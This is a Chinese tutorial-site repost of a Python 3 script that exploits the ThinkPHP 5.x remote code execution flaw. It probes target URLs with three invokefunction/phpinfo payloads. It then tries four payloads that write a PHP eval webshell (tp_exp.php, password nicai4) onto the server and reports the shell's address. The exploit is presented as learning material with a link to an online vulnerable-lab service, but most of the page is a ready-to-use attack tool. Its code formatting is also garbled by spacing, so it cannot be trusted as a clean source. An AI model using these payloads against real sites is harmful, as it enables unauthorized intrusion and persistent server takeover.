thinkphp实战教程之博客技术学习(python3编写ThinkPHP命令执行Getshell的方法)
类别:脚本大全 浏览量:723
时间:2022-01-22 01:32:02 thinkphp实战教程之博客技术学习
python3编写ThinkPHP命令执行Getshell的方法加了三个验证漏洞以及四个getshell方法
|
# /usr/bin/env python3 # -*- coding: utf-8 -*- # @author: morker # @email: [email]admin@nsf.me[/email] # @blog: [url]http://nsf.me/[/url] import requests import sys def demo(): print ( ' _______ _ _ _ _____ _ _ _____ ' ) print ( ' |__ __| | (_) | | | __ \| | | | __ \ ' ) print ( ' | | | |__ _ _ __ | | _| |__) | |__| | |__) |' ) print ( ''' | | | '_ \| | '_ \| |/ / ___/| __ | ___/ ''' ) print ( ' | | | | | | | | | | <| | | | | | | ' ) print ( ' |_| |_| |_|_|_| |_|_|\_\_| |_| |_|_| ' ) print () print ( '\tthinkphp 5.x (v5.0.23 and v5.1.31 following version).' ) print ( '\tremote command execution exploit.' ) print ( '\tvulnerability verification and getshell.' ) print ( '\ttarget: http://target/public' ) print () class thinkphp(): def __init__( self ,web): self .web = web self .headers = { "user-agent" : "mozilla/5.0 (windows nt 10.0; win64; x64; rv:63.0) gecko/20100101 firefox/63.0" , "accept" : "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8" , "accept-language" : "zh-cn,zh;q=0.8,zh-tw;q=0.7,zh-hk;q=0.5,en-us;q=0.3,en;q=0.2" , "accept-encoding" : "gzip, deflate" , "content-type" : "application/x-www-form-urlencoded" , "connection" : "keep-alive" } def verification( self ): i = 0 s = 0 verifications = [ '/?s=index/\\think\request/input&filter=phpinfo&data=1' , '/?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1' , '/?s=index/\\think\container/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1' ] while true: if i = = len (verifications): break else : url = self .web + verifications[i] req = requests.get(url = url,headers = self .headers) if 'phpinfo()' in req.text: s = 1 break else : s = 0 i + = 1 if s = = 1 : print ( "[+] there are vulnerabilities." ) print () toshell = input ( "[*] getshell? (y/n):" ) if toshell = = 'y' : self .getshell() elif toshell = = 'n' : sys.exit() else : sys.exit() else : print ( "[-] there are no vulnerabilities." ) def getshell( self ): getshells = [ '?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=tp_exp.php&vars[1][]=<?php @eval($_post[nicai4]); ?>' , '?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20%27<?php%20@eval($_post[nicai4]);%20?>%27%20>>%20tp_exp.php' , '?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20^<?php%20@eval($_post[nicai4]);%20?^>%20>>tp_exp.php' , '?s=index/\\think\\template\driver\\file/write&cachefile=tp_exp.php&content=<?php%20eval($_post[nicai4]);?>' ] shell = self .web + '/tp_exp.php' i = 0 s = 0 while true: if i = = len (getshells): break else : url = self .web + getshells[i] req = requests.get(url = url,headers = self .headers) req_shell = requests.get(url = shell,headers = self .headers) if req_shell.status_code = = 200 : s = 1 break else : s = 0 i + = 1 if s = = 1 : print ( "[+] webshell :%s password :nicai4" % shell) else : print ( "[-] the vulnerability does not exist or exists waf." ) def main(): demo() url = input ( "[*] please input your target: " ) run = thinkphp(url) run.verification() if __name__ = = '__main__' : main() |
注:图中的测试网址为在线漏洞环境,可自己去在线搭建测试。
环境地址:https://www.vsplate.com/
效果图:
以上就是本文的全部内容,希望对大家的学习有所帮助,也希望大家多多支持开心学习网。
原文链接:https://bbs.ichunqiu.com/thread-48729-1-1.html
您可能感兴趣
- thinkphp5.1修改(ThinkPHP 5.1 跨域配置方法)
- thinkphp5单例原理(Thinkphp5框架简单实现钩子Hook行为的方法示例)
- thinkphp5框架分析(thinkPHP5框架路由常用知识点汇总)
- thinkphp5 api开发(thinkphp5框架前后端分离项目实现分页功能的方法分析)
- thinkphp5数据库配置(Thinkphp5框架实现获取数据库数据到视图的方法)
- thinkphp兼容dedecms(DedeCMS Error:Tag disabled:"php"的解决办法)
- thinkphp支付宝支付(thinkPHP和onethink微信支付插件分享)
- thinkphp怎么输出二维值(thinkphp 表名 大小写 窍门)
- thinkphp伪静态实例(thinkPHP+mysql+ajax实现的仿百度一下即时搜索效果详解)
- php微信支付怎么做(ThinkPHP框架整合微信支付之Native 扫码支付模式一图文详解)
- thinkphp前后端配合(thinkPHP+LayUI 流加载实现功能)
- thinkphp微信开发教程(微信公众平台开发教程④ ThinkPHP框架下微信支付功能图文详解)
- thinkphp数据库使用(thinkphp3.2同时连接两个数据库的简单方法)
- thinkphp框架详解(thinkphp3.2框架中where条件查询用法总结)
- thinkphp分页效果怎样(thinkphp5+layui实现的分页样式示例)
- vuephp后台开发框架(Vue+thinkphp5.1+axios实现文件上传)
- 《祝卿好》台词又土又甜,就喜欢这么直接的恋爱(祝卿好台词又土又甜)
- 大女主 汤唯垂青电视圈,搭档朱亚文出演《大明皇妃孙若微传》(汤唯垂青电视圈)
- 红色代表什么(红色代表什么情感和含义)
- 高中数学题(高中数学题型总结及解题方法)
- 冰岛旅游攻略(冰岛旅游攻略及花费)
- 为什么现在年轻人越来越喜欢买衣服(为什么现在年轻人越来越喜欢买衣服穿)
热门推荐
- 最新版mysql 安装教程(新手如何安装Mysql亲测有效)
- apache设置站点(Apache 多端口多站点配置方法)
- ILSpy反编译工具的使用
- sqlserver 空间数据类型(SQL Server数据类型转换方法)
- 多个图片拼接python实现(python实现两张图片的像素融合)
- python定义dataframe(对python dataframe逻辑取值的方法详解)
- html5复选框属性教程(HTML5单选框、复选框、下拉菜单、文本域的实现代码)
- laravel查询数据库视图(Laravel5.7 数据库操作迁移的实现方法)
- mysql为啥使用b+树(MySQL用B+树作为索引结构有什么好处)
- python中encode中文自定义编码(详解Python解决抓取内容乱码问题decode和encode解码)
排行榜
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9